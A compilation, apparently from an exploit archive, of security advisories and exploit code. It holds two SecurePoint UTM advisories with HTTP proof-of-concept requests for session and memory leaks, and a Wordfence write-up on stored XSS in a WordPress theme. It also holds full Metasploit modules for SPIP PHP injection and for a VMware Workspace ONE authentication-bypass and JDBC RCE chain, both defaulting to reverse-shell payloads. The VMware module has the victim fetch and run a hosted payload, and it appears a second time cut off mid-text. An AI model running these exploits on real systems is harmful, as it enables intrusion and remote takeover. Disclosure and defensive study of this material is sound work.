<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: SecurePoint UTM<br />Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn<br />Type: Use of Uninitialized Variable [CWE-457]<br />Date found: 2023-01-05<br />Date published: 2023-04-12<br />CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)<br />CVE: CVE-2023-22897<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.4.1<br />SecurePoint UTM 12.2.4<br />SecurePoint UTM 12.2.3.4<br />SecurePoint UTM 12.2.3.3<br />SecurePoint UTM 12.2.3.2 Reseller Preview<br />SecurePoint UTM 12.2.3.1 Reseller Preview<br /><br /><br />4. INTRODUCTION<br />===============<br />With secure networks, home office, site connectivity and the protection of your<br />data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure<br />your networks - with suitable IT security solutions for small and medium-sized<br />businesses for rent, purchase or as a complete service.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The firewall offers an administrative web panel on port 11115 and a user login<br />panel on port 443. Both use the endpoint at "/spcgi.cgi" to perform authentication<br />checks via the "login" command. Once authentication is successful (a low-privileged<br />user account is sufficient), and the returned "sessionid" has never been used in<br />any subsequent request, then the application will return remote memory contents<br />within the sessionid JSON attribute on all subsequent requests (that don't contain<br />the sessionId, hence referring to as "unused"). The leaked memory contents include<br />memory addresses as well as environment variables.<br /><br />This happens because the application doesn't correctly initialize a variable later<br />used in the JSON output referencing the sessionid.<br /><br />Successful exploits can allow an authenticated attacker to leak memory contents,<br />which might contain sensitive information, and help defeat memory protections such<br />as ASLR.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />First, authenticate using any legitimate user against either the admin panel on port<br />11115 or the user panel on port 443 by using a single HTTP POST request like the<br />following:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1<br />Content-Length: 100<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"user","pass":"Password"}}<br /><br />This returns a sessionid, which you must not use in subsequent requests. This is<br />important because the exploit won't work if you authenticate using the web interface<br />because the sessionid is immediately "used" in further requests being issued by the<br />application.<br /><br />Then submit any JSON request without a sessionid against the same endpoint, such as:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1<br />Content-Length: 2<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />User-Agent: test<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{}<br /><br />The remote memory contents are afterward leaked in response to that request within<br />the sessionid JSON attribute.<br /><br /><br />7. SOLUTION<br />===========<br />Upgrade to version 12.2.5.1 or newer<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-04: Discovery of the vulnerability<br />2023-01-06: Contacted vendor via a known contact<br />2023-01-06: Vendor response<br />2023-01-06: Sent full vulnerability details to vendor<br />2023-01-06: Vendor acknowledged the vulnerability<br />2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers<br />2023-01-06: RCE Security agrees to the proposed disclosure date<br />2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability<br />2023-01-10: MITRE assigns CVE-2023-22897<br />2023-04-12: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: SecurePoint UTM<br />Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2023-01-05<br />Date published: 2023-04-11<br />CVSSv3 Score: 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2023-22620<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.5<br />SecurePoint UTM 12.2.4.1<br />SecurePoint UTM 12.2.4<br />SecurePoint UTM 12.2.3.4<br />SecurePoint UTM 12.2.3.3<br />SecurePoint UTM 12.2.3.2 Reseller Preview<br />SecurePoint UTM 12.2.3.1 Reseller Preview<br /><br /><br />4. INTRODUCTION<br />===============<br />With secure networks, home office, site connectivity and the protection of your<br />data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure<br />your networks - with suitable IT security solutions for small and medium-sized<br />businesses for rent, purchase or as a complete service.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The firewall offers an administrative web panel on port 11115 and a user login panel<br />on port 443. Both offer the endpoint at "/spcgi.cgi" which leaks the "sessionid" of<br />the last active authenticated user to any unauthenticated user when the application<br />processes an invalid authentication attempt.<br /><br />However, the attacker needs two more authentication attributes to be able to successfully<br />authenticate using the leaked sessionid:<br /><br />1. The attacker must have the same REMOTE_ADDR as the user whose sessionid is leaked.<br />This isn't trivial to achieve, but exploitation is easy in configurations where any of the<br />two panels are NAT'ed.<br /><br />2. The attacker needs to know the User-Agent of the user whose sessionid is leaked.<br />However, since the application does not enforce a rate limit on the authentication<br />endpoint, it is trivially easy to brute-force the User-Agent belonging to the leaked<br />session and then authenticate to the device. As the linked blog post describes, the<br />number of possible User-Agents can be further reduced.<br /><br />Interestingly this exploit works across both authentication panels, so an attacker<br />can also leak the sessionId of an administrator using the user login interface and vice<br />versa.<br /><br />Successful exploits can allow an unauthenticated attacker to authenticate against<br />the administrative interface without knowing the user's password. If the last<br />authenticated user has administrative privileges, this means a complete compromise<br />of the device since it is trivially easy to escalate from admin to root using legitimate<br />features.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />Wait until a user successfully authenticates against the device and then issue an<br />invalid authentication attempt like:<br /><br />POST /spcgi.cgi HTTP/1.1<br />Host: 192.168.175.1:11115<br />Content-Length: 86<br />Accept: */*<br />Content-Type: application/json; charset=UTF-8<br />Connection: close<br /><br />{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}<br /><br />The application then returns the last active user's sessionid:<br /><br />{<br /> "sessionid": "8d4602543120a48a4ec30762c5cad3fa",<br /> "mode": "w",<br /> "result": {<br /> "module": "server",<br /> "code": 401,<br /> "status": "Unauthorized",<br /> "message": "failure: access denied"<br /> },<br /> "version": "11.6"<br />}<br /><br />This is also exploitable against the user interface on port 443.<br /><br /><br />7. SOLUTION<br />===========<br />Upgrade to version 12.2.5.1 or newer<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-04: Discovery of the vulnerability<br />2023-01-04: MITRE assigns CVE-2023-22620<br />2023-01-05: Contacted vendor via their security@<br />2023-01-05: Vendor response<br />2023-01-05: Sent full vulnerability details to vendor<br />2023-01-06: Vendor acknowledged the vulnerability<br />2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers<br />2023-01-06: RCE Security agrees to the proposed disclosure date<br />2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability<br />2023-04-11: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/<br />https://github.com/MrTuxracer/advisories<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SPIP form PHP Injection',<br /> 'Description' => %q{<br /> This module exploits a PHP code injection in SPIP. The vulnerability exists in the<br /> oubli parameter and allows an unauthenticated user to execute arbitrary commands<br /> with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions<br /> are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.<br /> },<br /> 'Author' => [<br /> 'coiffeur', # Initial discovery<br /> 'Laluka', # PoC<br /> 'Julien Voisin' # MSF module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ],<br /> [ 'URL', 'https://therealcoiffeur.com/c11010' ],<br /> [ 'CVE', '2023-27372' ],<br /> ],<br /> 'Privileged' => false,<br /> 'Platform' => %w[php linux unix],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'Automatic (PHP In-Memory)',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },<br /> 'Type' => :php_memory,<br /> 'Payload' => {<br /> 'BadChars' => "\x22\x00"<br /> }<br /> }<br /> ],<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_memory,<br /> 'Payload' => {<br /> 'BadChars' => "\x22\x00\x27"<br /> }<br /> }<br /> ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-02-27'<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'spip.php')<br /> res = send_request_cgi({ 'uri' => uri.to_s })<br /><br /> return Exploit::CheckCode::Unknown('Target is unreachable.') unless res<br /> return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text<br /> return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/<br /><br /> version = ::Regexp.last_match(1)<br /><br /> if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/<br /> version = ::Regexp.last_match(1)<br /> end<br /><br /> return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version<br /><br /> print_status("SPIP Version detected: #{version}")<br /><br /> rversion = Rex::Version.new(version)<br /> if rversion >= Rex::Version.new('4.2.0')<br /> if rversion < Rex::Version.new('4.2.1')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('4.1.0')<br /> if rversion < Rex::Version.new('4.1.18')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('4.0.0')<br /> if rversion < Rex::Version.new('4.0.10')<br /> return Exploit::CheckCode::Appears<br /> end<br /> elsif rversion >= Rex::Version.new('3.2.0')<br /> if rversion < Rex::Version.new('3.2.18')<br /> return Exploit::CheckCode::Appears<br /> end<br /> end<br /><br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def execute_command(cmd, args = {})<br /> send_request_cgi(<br /> {<br /> 'uri' => args['uri'],<br /> 'method' => 'POST',<br /> 'vars_post' => {<br /> 'page' => 'spip_pass',<br /> 'lang' => 'fr',<br /> 'formulaire_action' => 'oubli',<br /> 'formulaire_action_args' => args['csrf'],<br /> 'oubli' => cmd<br /> }<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')<br /> res = send_request_cgi({ 'uri' => uri })<br /><br /> fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res<br /> fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200<br /><br /> csrf = ''<br /> unless (node = res.get_html_document.xpath('//form//input[@name="formulaire_action_args"]')).empty?<br /> csrf = node.first['value']<br /> end<br /><br /> print_status("Got anti-csrf token: #{csrf}")<br /><br /> print_status("#{rhost}:#{rport} - Attempting to exploit...")<br /><br /> oubli = ''<br /> case target['Type']<br /> when :php_memory<br /> oubli = "s:#{payload.encoded.length + 6 + 2}:\"<?php #{payload.encoded}?>\";"<br /> when :unix_memory<br /> oubli = "s:#{payload.encoded.length + 14 + 4}:\"<?php system('#{payload.encoded}')?>\";"<br /> end<br /> execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class InvalidRequest < StandardError<br /> end<br /><br /> class InvalidResponse < StandardError<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',<br /> 'Description' => %q{<br /> This module combines two vulnerabilities in order achieve remote code execution in the context of the<br /> `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in<br /> OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the<br /> authentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBC<br /> injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker<br /> to deserialize arbitrary Java objects which can allow remote code execution.<br /> },<br /> 'Author' => [<br /> 'mr_me', # Discovery & PoC<br /> 'jheysel-r7' # Metasploit Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22956'],<br /> ['CVE', '2022-22957'],<br /> ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],<br /> ['URL', 'https://github.com/sourceincite/hekate/'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']<br /> ],<br /> 'DisclosureDate' => '2022-04-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x22"<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'LPORT' => 5555<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> # The VMware products affected do no expose any version information to unauthenticated users.<br /> # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were<br /> # patched in the following VMware update: https://kb.vmware.com/s/article/88099<br /> def check<br /> @token = get_authentication_token<br /> Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')<br /> rescue InvalidRequest, InvalidResponse => e<br /> return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /><br /> # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).<br /> #<br /> # Return the authentication token<br /> def get_authentication_token<br /> oauth_client = ['Service__OAuth2Client', 'acs'].sample<br /> res_activation_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),<br /> 'method' => 'POST'<br /> })<br /><br /> unless res_activation_token<br /> raise InvalidRequest, 'No response from the server when requesting an activation token'<br /> end<br /><br /> unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"<br /> end<br /><br /> activation_token = res_activation_token.get_json_document['activationToken']<br /><br /> res_client_info = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => activation_token<br /> })<br /><br /> unless res_client_info<br /> raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'<br /> end<br /><br /> unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'<br /> raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"<br /> end<br /><br /> json_client_info = res_client_info.get_json_document<br /> client_id = json_client_info['client_id']<br /> client_secret = json_client_info['client_secret']<br /><br /> print_good("Leaked client_id: #{client_id}")<br /> print_good("Leaked client_secret: #{client_secret}")<br /> post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"<br /><br /> res_access_token = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'data' => post_data<br /> })<br /><br /> unless res_access_token<br /> raise InvalidRequest, 'No response from the server when requesting the access token'<br /> end<br /><br /> unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']<br /> raise InvalidResponse, 'Invalid response from the server when requesting the access token'<br /> end<br /><br /> res_access_token.get_json_document['access_token']<br /> end<br /><br /> # Serve the files for the target machine to download.<br /> # If the request to the server ends in .xml the victim is requesting the spring bean generated by payload_xml method.<br /> # If the request doesn't in .xml the victim is requesting the linux dropper payload.<br /> def on_request_uri(cli, request)<br /> vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")<br /> if request.to_s.include?('.xml')<br /> vprint_status('Sending XML response: ')<br /> send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-strem' })<br /> vprint_status('Response sent')<br /> else<br /> vprint_status('Sending PAYLOAD: ')<br /> send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-strem' })<br /> end<br /> end<br /><br /> # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim<br /> #<br /> # Returns an XML document containing the payload.<br /> def generate_payload_xml(cmd)<br /> bean = ''<br /> builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)<br /> builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do<br /> builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do<br /> builder.constructor do<br /> builder.list do<br /> builder.value('/bin/sh')<br /> builder.value('-c')<br /> builder.value(cmd)<br /> end<br /> end<br /> end<br /> end<br /><br /> bean.gsub!('constructor', 'constructor-arg')<br /> vprint_status(bean)<br /> bean<br /> end<br /><br /> # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.<br /> def trigger_jdbc_rce(jwt, sub_cmd)<br /> # jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{filename}"<br /> jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-urlencoded',<br /> 'Connection' => 'keep-alive',<br /> 'cookie' => "HZN=#{jwt}",<br /> 'data' => jdbc_uri<br /> })<br /><br /> fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> vprint_status("Executing the following command: #{cmd}")<br /> @payload_xml = generate_payload_xml(cmd)<br /> trigger_jdbc_rce(opts[:jwt], cmd)<br /> end<br /><br /> # Instruct the user to exploit CVE-2022-22960<br /> def on_new_session(_client)<br /> print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')<br /> end<br /><br /> def exploit<br /> unless @token<br /> begin<br /> @token = get_authentication_token<br /> rescue InvalidRequest => e<br /> fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> rescue InvalidResponse => e<br /> fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")<br /> end<br /> end<br /><br /> @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'<br /> start_service('Path' => "/#{@payload_name}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded, { jwt: @token })<br /> when :linux_dropper<br /> execute_cmdstager({ jwt: @token })<br /> else<br /> fail_with(Failure::BadConfig, 'Invalid target specified')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>On March 14, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for 2 nearly identical Cross-Site Scripting vulnerabilities in the Weaver Xtreme theme and the Weaver Show Posts plugin, which each have over 10,000 installations. The plugin developer responded the same day and we provided full disclosure.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023.<br /><br />A patched version of the Weaver Show Posts plugin, 1.7, was released on April 1, 2023, while the patched version 6.2 of the Weaver Xtreme theme became available on April 5, 2023.<br /><br />This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.<br /><br />Vulnerability Summary From Wordfence Intelligence<br /><br />Description:Weaver Xtreme Theme <= 5.0.7 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name <br /><br />Affected Theme: Weaver Xtreme <br /><br />Theme Slug: weaver-xtreme<br /><br />Affected Versions: <= 5.0.7<br /><br />CVE ID: CVE-2023-1403 <br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Ramuel Gall <br /><br />Fully Patched Version: 6.2<br /><br />The Weaver Xtreme theme for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 5.0.7. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: Weaver Show Posts <= 1.6 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name <br /><br />Affected Plugin: Weaver Show Posts <br /><br />Plugin Slug: show-posts<br /><br />Affected Versions: <= 1.6<br /><br />CVE ID: CVE-2023-1404 <br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Alex Thomas <br /><br />Fully Patched Version: 1.7<br /><br />The Weaver Show Posts plugin for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 1.6. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Vulnerability Analysis<br /><br />Both the Weaver Xtreme theme and the Weaver Show Posts plugin contain author attribution functionality that can be used by site visitors to view all posts by a given author. Although the function in question used escaping to prevent Cross-Site Scripting, the order of the functions used meant that the author name was not actually escaped upon output:<br /><br />sprintf <br /><br />This is the sort of mistake that would be very difficult to spot via a manual code review - it looks correct and was almost certainly intended to prevent exactly the sort of issue we found. We only spotted it because one of the author names on our test platform was prepopulated with a Cross-Site Scripting payload, which fired when testing an unrelated issue.<br /><br />The reason this is vulnerable is that the esc_attr function runs before the sprintf function populates the unescaped output of the get_the_author function.<br /><br />The patched version simply escapes the output of get_the_author and then wraps the entire block in wp_kses_post for good measure:<br /><br />fixed <br /><br />This type of vulnerability emphasizes the need for dynamic security testing in addition to code review, as vulnerabilities are often hiding in plain sight.<br /><br />While this type of vulnerability does require a trusted (contributor+) attacker in most configurations to exploit, Cross-Site Scripting can be used to take over a website, for instance, if an administrator views or previews a post by a contributor with malicious JavaScript hidden in their author name.<br /><br />On sites that use contributors, it is required for administrators or editors to review posts by contributors in order to publish them, so this is a genuine risk for sites that make use of this functionality.<br /><br />Disclosure Timeline<br /><br />March 14, 2023 - Two members of our Threat Intelligence team, Ramuel Gall and Alex Thomas, find similar issues in the Weaver Xtreme theme and Weaver Show Posts plugin. Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the plugin to the developer, who responds quickly.<br /><br />April 1, 2023 - The Weaver Show Posts plugin receives a patch in version 1.7.<br /><br />April 5, 2023 - The Weaver Xtreme theme receives a patch in version 6.2.<br /><br />April 13, 2023 - The firewall rule becomes available to all Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed two flaws in the Weaver Xtreme theme and Weaver Show Posts plugin that enabled authenticated attackers, with at least contributor-level access to a site, to inject JavaScript via their display name which could ultimately lead to complete site compromise. This flaw has been fully patched in version 1.7 of Weaver Show Posts and 6.2 of Weaver Xtreme. We recommend that WordPress users immediately verify that their site has been updated to the latest patched versions available.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023.<br /><br />If you know a friend or colleague who is using the Weaver Xtreme theme or Weaver Show Posts plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.<br /><br />Special thanks to Senior Web Application Vulnerability Researcher Alex Thomas for finding the second vulnerability in the Weaver Show Posts plugin shortly after the initial discovery of the Weaver Xtreme theme vulnerability.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class InvalidRequest < StandardError<br /> end<br /><br /> class InvalidResponse < StandardError<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',<br /> 'Description' => %q{<br /> This module combines two vulnerabilities in order achieve remote code execution in the context of the<br /> `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in<br /> OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the<br /> authentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBC<br /> injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker<br /> to deserialize arbitrary Java objects which can allow remote code execution.<br /> },<br /> 'Author' => [<br /> 'mr_me', # Discovery & PoC<br /> 'jheysel-r7' # Metasploit 